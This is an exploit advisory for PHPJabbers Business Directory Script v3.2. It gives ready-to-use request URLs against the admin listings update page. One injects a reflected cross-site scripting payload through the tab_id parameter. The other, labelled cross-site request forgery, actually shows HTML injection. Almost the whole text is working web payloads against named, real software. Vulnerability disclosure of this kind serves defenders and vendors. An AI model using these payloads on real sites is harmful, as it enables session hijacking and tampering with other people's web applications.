# Exploit Title: PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities # Date: 09/08/2023 # Exploit Author: Kerimcan Ozturk # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/business-directory-script/ # Version: 3.2 # Tested on: Windows 10 Pro ## Description Technical Detail / POC ========================== Login Account Go to Property Page ( https://website/index.php?controller=pjAdminListings&action=pjActionUpdate) Edit Any Property ( https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57 ) [1] Cross-Site Scripting (XSS) Request: https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id= "<script><image/src/onerror=prompt(8)> [2] Cross-Site Request Forgery Request: https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id= "<script><font%20color="green">Kerimcan%20Ozturk</font> Best Regards